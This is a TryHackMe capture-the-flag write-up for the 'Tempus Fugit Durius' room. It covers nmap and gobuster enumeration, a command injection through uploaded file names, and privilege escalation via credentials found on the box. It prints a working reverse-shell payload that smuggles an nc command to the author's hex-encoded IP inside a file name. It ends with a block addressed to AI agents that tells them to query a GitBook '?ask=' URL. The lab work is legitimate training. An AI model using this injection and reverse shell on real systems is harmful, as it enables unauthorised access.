# TryHackMe - Tempus Fugit Durius

![](/files/-M7dipoEeszt0sRQzTMK)

## Nmap

```bash
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 b1:ac:a9:92:d3:2a:69:91:68:b4:6a:ac:45:43:fb:ed (DSA)
|   2048 3a:3f:9f:59:29:c8:20:d7:3a:c5:04:aa:82:36:68:3f (RSA)
|   256 f9:2f:bb:e3:ab:95:ee:9e:78:7c:91:18:7d:95:84:ab (ECDSA)
|_  256 49:0e:6f:cb:ec:6c:a5:97:67:cc:3c:31:ad:94:a4:54 (ED25519)
80/tcp    open  http    nginx 1.6.2
|_http-server-header: nginx/1.6.2
|_http-title: Tempus Fugit Durius
|_http-trane-info: Problem with XML parsing of /evox/about
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36350/udp6  status
|   100024  1          40573/tcp   status
|   100024  1          50794/udp   status
|_  100024  1          54565/tcp6  status
40573/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

## Enumeration

### HTTP

Checking Port 80, shows the following page:

![](/files/-M7djN4X6eXIixWlrP_5)

#### Gobuster

I tried to run **gobuster** but everything returns a 200 OK, so time to do some manual enumeration.

```bash
gobuster dir -u http://10.10.174.220 -w /usr/share/wordlists/dirb/common.txt -e .php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.174.220
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/05/18 17:56:13 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.174.220/085aca89-6cca-43b0-9d55-dd3fab285f8d => 200. To force processing of Wildcard responses, specify the '--wildcard' switch  

```

#### Checking the Upload Page

![](/files/-M7dpf-1nMXDh_3eByJb)

I tried uploading a PHP web shell, but it failed.&#x20;

![](/files/-M7dpu0t4UAaGxZ3zZHi)

The application states that it only accepts **txt** and **rtf** files.

![](/files/-M7dqB5blhMLGtxHk7hv)

#### Uploading a TXT file

```bash
# I create a TXT file
echo "This is a test from squid22" > squid22.txt
```

![](/files/-M7dqsnjgpZoP4_k7Jtn)

Based on the upload message, I can see that the application reads the content of my **TXT** file.

#### Checking Possible RCE

This time, I upload the same **TXT** file, but I add the command **id** to see what happens.

![](/files/-M7ds_2iswSsOGUPIed7)

And that worked.&#x20;

![](/files/-M7ds-F30L42vBMdoBCp)

## Exploit

Trying to get a shell with **netcat** was a bit of a hit and miss. Every time, I tried something different, I got a message saying **the file name was way too long**.

![](/files/-M7eZ6sWPa7lmXYM17bL)

After some research and a lot of failed shell execution, I managed to get a shell using my IP addresses encoded in hex.

![](/files/-M7ec9aNN43bpkbR3mhs)

My code to get a shell

```bash
"#;nc 0x0A0B07BC 53 -w sh;a.txt"
```

If you try that on your our Kali machine, you can see that bash interprets the IP address in hex and it works fine. The reason for the **a.txt** at the end was due to the file filter which only allows **TXT** and **RTF**.

![](/files/-M7eY_Z5I5mWRxNEfzrC)

![](/files/-M7ebpVvTAghyO7S4ILO)

## Code Research

Only allows **TXT** and **RTF**

![](/files/-M7eeD3gRerSVIs8zWpR)

And here is why the IP address was failing...

![](/files/-M7eePbEohdGclMNhPrN)

## Privilege Escalation

We find some creds under the **/app** directory which allows us to login as root.

![](/files/-M7ef47feSwfJCYPOczA)

![](/files/-M7enOjQHBmRJIoCBIHb)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://squid22.gitbook.io/notes/ctf/tryhackme-writeups/tryhackme-tempus-fugit-durius.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.